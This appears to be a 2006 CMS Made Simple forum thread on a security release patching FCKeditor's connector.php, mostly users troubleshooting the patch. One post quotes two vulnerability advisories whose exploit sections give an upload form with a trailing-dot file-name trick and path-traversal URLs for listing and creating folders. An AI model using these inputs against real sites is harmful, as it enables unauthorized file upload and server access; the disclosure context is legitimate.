0.12.2 Released! Please READ!

Project Announcements. This is read-only, as in... not for problems/bugs/feature request.
Ted
Power Poster
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Basically, the connector.php file isn't checking permissions.  If used the right way, it can cause someone to upload anything to the uploads/images directory.  My 2nd reply above basically explains how to fix it.  I assume it'll be the same process in TinyMCE.
User avatar
fredt
Forum Members
Forum Members
Posts: 144
Joined: Mon Jun 27, 2005 10:36 am
Location: Southern France

Re: 0.12.2 Released! Please READ!

Post by fredt »

OK, I hand-patched my good old 0.11.2. Hope 0.13 arrives soon !
MichaelK

Re: 0.12.2 Released! Please READ!

Post by MichaelK »

I updated to the latest version 0.12.2 and there's an error with the image browser.

When I wanna put an Image in my editor it won't work anymore. When I delete the code:
require_once(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(__FILE__)))))))))) . '/include.php');
check_login();
Then it works just fine!!!

This fix is not good I think.... Please help!!!!!!
Ted
Power Poster
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Is anyone else having an issue with this patch?  I just tested it in 3 different places and fck image browser still works when logged in.
evoluzzer
Forum Members
Forum Members
Posts: 27
Joined: Thu May 19, 2005 9:11 pm

Re: 0.12.2 Released! Please READ!

Post by evoluzzer »

Yes i stumbled over the issue.... i got an javascripterror. The directory listing is missing....

Best regards
Chris
Ted
Power Poster
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Was this an upgrade to 0.12.2?  Or the manual patching?

And I'm assuming this is IE 6...
evoluzzer
Forum Members
Forum Members
Posts: 27
Joined: Thu May 19, 2005 9:11 pm

Re: 0.12.2 Released! Please READ!

Post by evoluzzer »

oh, i patched it manually. cmsmadesimple is in version 0.12beta or so but with many changes. Yes it was the ie6...........
cyberman

Re: 0.12.2 Released! Please READ!

Post by cyberman »

evoluzzer wrote: cmsmadesimple is in version 0.12beta
Perhaps you should go to 0.12.1 stable :) to the first ...
Ted
Power Poster
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

Someone had the same issue while patching a 0.11.1 install this morning.  I'm thinking your best bet it to upgrade fully to 0.12.2.
rllqph

Re: 0.12.2 Released! Please READ!

Post by rllqph »

i didn't have any problem on the upgrade. i already upgraded to php5.1.4!
dirtywhitellama

Re: 0.12.2 Released! Please READ!

Post by dirtywhitellama »

Replacing that one php file fixes the security problem - right? I don't need to do anything else?
tsw
Power Poster
Power Poster
Posts: 1408
Joined: Tue Dec 13, 2005 10:50 pm
Location: Finland

Re: 0.12.2 Released! Please READ!

Post by tsw »

If you are runngin 0.12.1 then changing that one file will be enough (or you can download the diff package which replaces that file and version.php file)
dcdent

about security flaw

Post by dcdent »

Taken from SecurityFocus

Code: Select all

NSAG-¹196-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
[b]FCKeditor 2.2[/b]

Site of manufacturer:
http://www.fckeditor.net

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/02/2006 - Answer of the manufacturer is absent. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/893.html

Risk: 
Critical

Description: 
Detour of a filtration of expansions of files is possible.

Influence: 
Loading of the forbidden files on target system. 

Exploit:

<form action="http://host/filemanager/browser/default/connectors/php/connector
.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br> 
<input id="txtFileUpload" type="file" name="NewFile"> 
<br> 
<input type="submit" value="Upload"> 
</form>

In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.) 
As a result on a server the file testfile.php will be created

Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!

www.nsag.ru 
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
and

Code: Select all

Advisory:
NSAG-¹195-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
FCKeditor 2.0 FC

Site of manufacturer:
http://www.fckeditor.net

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/02/2006 - Answer of the manufacturer is absent. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/952.html

Risk: 
Hide

Description: 
The output for limits of a virtual directory is possible.

Influence: 
Listing of directories, creation of folders outside a virtual directory.

Exploit:

http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAM
E

Decision: 
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!

www.nsag.ru 
«Nemesis» © 2006
------------------------------------ 
Nemesis Security Audit Group © 2006.
miss_d_bus
Forum Members
Forum Members
Posts: 121
Joined: Sun May 01, 2005 4:27 pm
Location: Kent, UK

Re: 0.12.2 Released! Please READ!

Post by miss_d_bus »

I get thiis javascript error when trying to insert an image too:

Line:118
Char:2
Code:0
Error:Object required
URL:http://www.domain.com/modules/FCKeditor ... slist.html

I upgraded to 0.12.2 from 0.11.2 I think it was.
I'm using IE6 if that helps...
Ted
Power Poster
Power Poster
Posts: 3329
Joined: Fri Jun 11, 2004 6:58 pm
Location: Fairless Hills, Pa USA

Re: 0.12.2 Released! Please READ!

Post by Ted »

You made the patch to connector.php?  It wasn't a full upgrade, right?
Post Reply

Return to “Announcements”